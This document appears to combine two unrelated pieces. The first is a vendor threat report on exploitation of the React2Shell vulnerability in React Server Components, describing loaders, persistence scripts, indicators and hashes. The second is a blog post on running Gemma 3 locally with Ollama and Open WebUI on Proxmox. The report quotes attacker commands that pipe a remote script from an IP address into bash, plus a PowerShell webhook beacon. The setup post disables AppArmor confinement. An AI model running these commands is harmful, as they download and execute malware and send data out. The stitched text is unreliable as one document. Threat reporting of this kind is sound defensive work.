Sophos analysts are investigating the widespread exploitation of a critical vulnerability dubbed ‘React2Shell’ that affects React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0. This vulnerability (CVE-2025-55182) was disclosed by React on December 3, 2025, and assigned a CVSS score of 10.0.

Vulnerability details

React2Shell is a flaw in the way React Server Components handle data sent from a user’s browser to the server. It affects certain versions of React’s server-side packages that process requests via the React “Flight” protocol, which is the mechanism for sending component data and server actions between the client and server. Many frameworks that rely on React Server Components, such as Next.js, are indirectly affected because they use the same deserialization logic.

The vulnerability is caused by unsafe handling of incoming data when the server converts network requests into JavaScript objects. When a client sends a request, React “deserializes” the data, meaning that it translates the request into internal program structures that the server can use. Due to insufficient validation of this data, an attacker can send a specially crafted request that does not follow the expected format. Instead of rejecting the malformed input, the server processes it and allows the threat actor’s data to interfere with how the application executes code internally.

An attacker could exploit this weakness to gain control over the code that the server runs and then execute arbitrary JavaScript, often with the same privileges as the application itself. In practical terms, a threat actor could access sensitive data, alter application behavior, or fully compromise the server environment. Because the attack is carried out by sending a single malicious HTTP request, no user credentials or authentication are required. The threat actor only needs network access to a vulnerable application endpoint. Research by the ShadowServer Foundation identified over 165,000 vulnerable IP addresses and 644,000 domains as of December 8.

Observed post-exploitation activity

Sophos analysts have observed multiple instances of post-exploitation activity occurring on customer networks. This activity has included the rapid deployment of Linux loaders; persistence via systemd, cron, and rc.local; covert installation of Node.js and obfuscated JavaScript in hidden directories; the use of public cloud infrastructure and multiple command and control (C2) servers; evidence of network discovery; and simple exfiltration and telemetry beacons via Canarytoken URLs and webhooks.

Multiple suspicious Windows commands were executed after exploitation of React2Shell was detected (see Figure 1).

Figure 1: Examples of suspicious post-exploitation commands executed via PowerShell on Windows

Several suspicious commands using /bin/sh and curl were also observed on Linux (see Figure 2).

Figure 2: Examples of suspicious post-exploitation commands executed on Linux

The pattern of these commands is consistent. Remote shell scripts or binaries are downloaded and executed, immediately followed by attempts to clean any trace of the attack. The detected payloads map to known Sophos detections for Linux loaders and agents. Analysis of the retrieved scripts revealed at least four key components, each of which is responsible for a different stage of the attack.

The first script (gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh, detected by Linux/DldrYI) is a multi-stage malware installer that establishes persistent access on Linux systems. Upon execution, it downloads a legitimate Node.js binary to a hidden directory and then deploys two Base64-encoded payloads: an encrypted data file and heavily obfuscated JavaScript malware. The JavaScript component uses AES-256-CBC encryption to decrypt and execute additional payloads, spawns a detached background process to maintain persistence, and implements anti-forensic measures by deleting the original installer script.

The second script (tsd.sh, detected by Linux/AgntGB) implements persistence for a component named ‘tsd’ by creating entries under ‘/etc/cron.hourly/tsd’ and ‘/etc/cron.hourly/tsd.sh’, leveraging systemd where available. If systemd or cron are not effective, then the script reverts to using rc.local. The script ensures that tsd is always running, restarting it if the process is not present to ensure that the host is resistant to simple reboots or process kills.

The third script (init.sh, detected by Linux/AgntGC) is a sophisticated malware deployment tool that establishes persistent system compromise through multiple redundancy mechanisms. Upon execution, it downloads a malicious binary from an AWS S3 bucket (hybird-accesskey-staging-saas[.]s3[.]dualstack[.]ap-northeast-1[.]amazonaws[.]com/agent), installs it to /usr/infju/system_os, and establishes persistence through both systemd service installation and cron-based process management. The malware masquerades as a legitimate system service (system_os.service) with automatic restart capabilities. A separate cron job runs daily at midnight to forcibly restart the process, ensuring continued operation even if the service is manually stopped. The script includes operating system detection for CentOS and Ubuntu, attempts privilege escalation via sudo commands, and creates a process management script that logs all restart activities to /var/log/system_os_management.log. The use of legitimate system directories, systemd integration, and multi-layered persistence mechanisms suggests the script is a professionally developed malware dropper designed for long-term, resilient system compromise. This script includes many Chinese comments, indicating possible links to Chinese-speaking development teams or tooling reuse.

The fourth script (b.sh, detected by Linux/DldrYG) functions as another loader in the ecosystem and is fetched via ‘/bin/sh -c $(curl -sfL hxxp://194[.]38[.]11[.]3:1790/b.sh | bash | gzip -n | base64 -w0)’. The use of curl | bash plus compression and encoding suggests the threat actor intends to limit the creation of artifacts on disk and may be aiming to bypass simple content inspection. The attacker issues a series of curl and nslookup commands against Canarytokens-style domains to confirm the success of the exploit (see Figure 3).

Figure 3: Attacker-issued commands against Canarytokens domains

On Windows systems, the attacker used the simple webhook beacon (redacted):

C:\Windows\system32\cmd.exe /d /s /c "powershell -c "curl hxxps://webhook[.]site/xxxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx""

In addition to the Chinese comments noted in the third script, several third-party researchers have observed the React2Shell flaw being exploited by Chinese threat actors. Amazon Web Services reported that infrastructure associated with Earth Lumia and Jackpot Panda, both of which are Chinese state-sponsored groups, has been identified in exploitation attempts. Palo Alto also described seeing the deployment of SNOWLIGHT and VShell malware during attacks, which appears to be consistent with Counter Threat Unit™ (CTU) observations of activity by Chinese state-sponsored group BRONZE SNOWDROP; however, these tools are not unique to one group and further evidence would be required to strengthen this attribution.

Research by Sysdig links exploitation of the React2Shell vulnerability to North Korean state-sponsored threat actors and suggests that the deployed EtherRAT malware overlaps with tooling in the Contagious Interview campaign. While Sophos analysts have observed EtherRAT deployment, the current data is insufficient to support attribution to North Korean actors or link the activity to Contagious Interview.

The public release of proof-of-concept (PoC) code to exploit CVE-2025-55182 means that exploitation will likely quickly expand beyond state-sponsored threat groups to opportunistic cybercriminals seeking to target credentials or install cryptominers. CTU™ researchers recommend that organizations operating internet-facing React infrastructure prioritize patching CVE-2025-55182 as appropriate in their environments.

Detections and threat indicators

SophosLabs has developed the following detections for this threat:

• Linux/DldrYI
• Linux/AgntGA
• Linux/AgntFZ
• Linux/AgntGB
• Linux/AgntGC
• Linux/DldrYG

The threat indicators in Table 1 can be used to detect activity related to this threat.

Indicator	Type	Context
gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh	Filename	Script used in first phase of observed React2Shell post-exploitation activity
011a62df99e52c8b73e259284ab1db47	MD5 hash	Script used in first phase of observed React2Shell post-exploitation activity
c3924fc5a90b6120c811eb716a25c168c72db0ba	SHA1 hash	Script used in first phase of observed React2Shell post-exploitation activity
fb3a6bdf98d5010350c04b2712c2c8357e079dec2d2a848d0dc2def2bafcc984	SHA256 hash	Script used in first phase of observed React2Shell post-exploitation activity
tsd.sh	Filename	Script used in second phase of observed React2Shell post-exploitation activity
3ba7c58df9b6d21c04eaa822738291b60c65b7c8	SHA1 hash	Script used in second phase of observed React2Shell post-exploitation activity
init.sh	Filename	Script used in third phase of observed React2Shell post-exploitation activity
88af4a140ec63a15edc17888a08a76b2	MD5 hash	Script used in third phase of observed React2Shell post-exploitation activity
da33bda52e9360606102693d68316f4ec1be673e	SHA1 hash	Script used in third phase of observed React2Shell post-exploitation activity
5a6fdcb5cf815ce065ee585a210c19d1c9efb45c293476554bf1516cc12a1bab	SHA256 hash	Script used in third phase of observed React2Shell post-exploitation activity
b.sh	Filename	Script used in fourth phase of observed React2Shell post-exploitation activity
1e54a769e692a69d74f598e0b1fdb2949f242de3	SHA1 hash	Script used in fourth phase of observed React2Shell post-exploitation activity

Table 1: Indicators for this threat

Several months ago, I got a Nucbox K8 Plus minicomputer to use as a Proxmox 9 server. At the time of this acquisition, I didn’t realize this minicomputer had an artificial intelligence (AI) engine [1] build in the CPU that could be used to run AI applications locally. A coworker recommended that I try Google Gemma 3 as a local AI open model to work with my use cases.

“Gemma is a family of generative artificial intelligence (AI) models and you can use them in a wide variety of generation tasks, including question answering, summarization, and reasoning.” [2], a review of the Gemma 3 key features is also posted on this page. This page [3] lists the minimum requirements for the 5 Gemma 3 models 270M, 1B, 4B, 12B, and 27B.

Default Open WebUI

My Setup with Open WebUI

• OS is a Linux Container (LXC) Ubuntu 24.04
• Ollama with gemma3:12b [4]
• Open WebUI [5]

Installing Ollama with Gemma 3

I used these steps to get Gemma setup. First review the requirements for RAM [3] before deciding with Gemma 3 model to install. You can start small (i.e. 4B or smaller) for testing before using a larger model. I’m using  4B and 12B with 16 GB of RAM with my installation. 

If you want to test some queries before installing the WebUI, this last command will open the interpreter:

ollama run gemma3:4b

Since I have a Ryzen 7 CPU, my next step was to install the admgpu [7] software to use the AI features of the CPU. The last step is to install the graphical interface to work from a browser using the Open WebUI [5] and there are several models listed here to get the WebUI running. I had to try a few combinations; in the end this is what I used:

sudo docker run -d -p 80:8080 -v ollama:/root/.ollama –add-host=host.docker.internal:host-gateway -v open-webui:/app/backend/data –name open-webui –restart always ghcr.io/open-webui/open-webui:main

Bugs in Proxmox 9 for LXC and AppArmor

For the Linux Container to run correctly, I had to edit the edit the LXC config file (114 is the container number) and add those two lines:

vi /etc/pve/lxc/114.conf

• lxc.apparmor.profile: unconfined
• lxc.mount.entry: /dev/null sys/module/apparmor/parameters/enabled none bind 0 0

And it may also be necessary to add this as well in the sudo command before installing the docker: –security-opt apparmor:unconfined

Login WebUI Interface

After the installation of the WebUI, you need to create the first admin account before being able to login.My first query asked my AI to describe the IPv4 header:

Gemma 3 offers the ability to work with large files with its 128K context, work with images and has multilingual support which is practical if you know multiple languages. Finally, it can run locally in PC, laptop and smartphone on a single GPU or TPU and smaller devices. If you have experience using Gemma 3, what are the use cases you are using it? You can add your comments in our contact form.

[1] https://www.amd.com/en/products/processors/laptop/ryzen/8000-series/amd-ryzen-7-8845hs.html

[2] https://ai.google.dev/gemma/docs/core

[3] https://ai.google.dev/gemma/docs/core#sizes

[4] https://deepmind.google/models/gemma/gemma-3/

[5] https://github.com/open-webui/open-webui

[6] https://ai.google.dev/gemma/docs/integrations/ollama?utm_source=deepmind.google&utm_medium=referral&utm_campaign=gdm&utm_content

[7] https://rocm.docs.amd.com/projects/radeon-ryzen/en/latest/docs/install/installryz/native_linux/install-ryzen.html

[8] https://forum.proxmox.com/threads/priviledge-container-disabling-apparmor-does-not-work.122168/

[9] https://blog.ktz.me/apparmors-awkward-aftermath-atop-proxmox-9/

[10] https://docs.openwebui.com/

———–

Guy Bruneau IPSS Inc.

My GitHub Page

Twitter: GuyBruneau

gbruneau at isc dot sans dot edu